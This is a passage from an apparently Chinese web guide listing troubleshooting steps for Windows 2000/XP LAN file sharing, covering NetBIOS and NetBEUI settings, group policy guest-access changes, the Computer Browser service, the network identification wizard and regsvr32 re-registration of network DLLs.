第四种查看协议，IPX，netbeui，TIP/IP协议，选择开启，共享用的是139，445端口. Win2k安装NetBEUI协议.

网上邻居－>属性－>本地连接－>属性---->安装------>协议------->NetBEUI Protocol

XP右击网上邻居-属性，选择要共享的网卡。把IP设置在局域网的同一个网段上。在XP中打开 TCP/IP 上的 NetBIOS

开始---->控制面板---->网络和 Internet 连接---->网络连接---->本地连接---->属性---->Internet 协议 (TCP/IP) ---->常规---->高级---->WINS选项---->NetBIOS---->启用 TCP/IP 上的 NetBIOS---->确定[点击2次]

第五种在共享文件夹前加个符号，比如￥，%等

第六种检查Win2000是否存在安全策略限制

开始 ->运行 ->gpedit.msc ->计算机配置 ->windows设置 ->本地策略 ->用户权利分配 ->删除“拒绝从网络访问这台计算机”中的guest用户。

XP的主策略安全设置

开 始 ->运行 ->gpedit.msc ->计算机配置 ->windows设置 ->安全设置 ->本地策略 ->用户权利分配 ->从网络上访问此计算机“属性那里性质Everone或者在”拒绝从网络访问这计算机“属性中删除GUEST 。

第七种“文件及打印机共享”的限制，允许其他用户访问我的文件点击激活就可以，其他的一些比较少碰到的问题如内部IP地址发生了冲突，甚至包括Hub故障、线路故障等就不说了

第八种启动”计算机浏览器“服务.根据微软的文档工作组中的一台或多台计算机没有启动或已关闭（禁用）”计算机浏览器“服务也会导致访问网络邻居失败.打开就可以了

开始---->我的电脑---->管理---->服务和应用程序---->服务---->在右边的详细信息窗格中，检查”计算机浏览器"服务是否已启动，右击计算机浏览器，然后单击启动

第九种运行网络标识向导.

我的电脑---->属性---->计算机名选项卡---->网络 ID按钮，开始“网络标识向导”： ---->下一步---->本机是商业网络的一部分，用它连接到其他工作着的计算机---->下一步---->公司使用没有域的网络---->下一步---->输入你的局域网的工作组名---->下一步---->完成

第十种检查RPC、Plug and Play服务已启动，检查相应的系统文件夹的权限，重新注册以下的动态链接库：

regsvr32 netshell.dll

regsvr32 netcfgx.dll

regsvr32 netman.dll

第十一种设置帐号和密码. 由于WinNT内核的操作系统，在访问远程计算机的时候，好像总是首先尝试用本地的当前用户名和密码来尝试，可能造成无法访问，在这里把用户密码添加进去就可以了。

第十二种ping ip ,然后在地址输入栏中输入“192.168.1.8”，单击“确定”。

用搜索计算机的方法访问，计算机更新列表需要时间，搜索计算机可以加快更新列表。点击“网上邻居”右键中的“搜索计算机”，输入计算机名，点击“立即搜索”，就可以看到你要访问的计算机。直接双击右边计算机名就可以打开它了。

用映射驱动器的方法访问，进入DOS方式，输入“NET VIEW \killer”，回车

★chmod修改文件权限失败

★记一次WEBSHELL提权

★《故事会》年龄不是问题

★以提问题代替命令

★linux中vim保存root权限的文件linux操作系统

★不是问题的问题人生哲理文章

★你的简历不是问题

★不是问题的问题作文450字

★限制目录的文件执行权限保障服务器安全WEB安全

★换个角度问题不是问题优秀作文

《提权不仅仅是文件权限上的问题（合集9篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式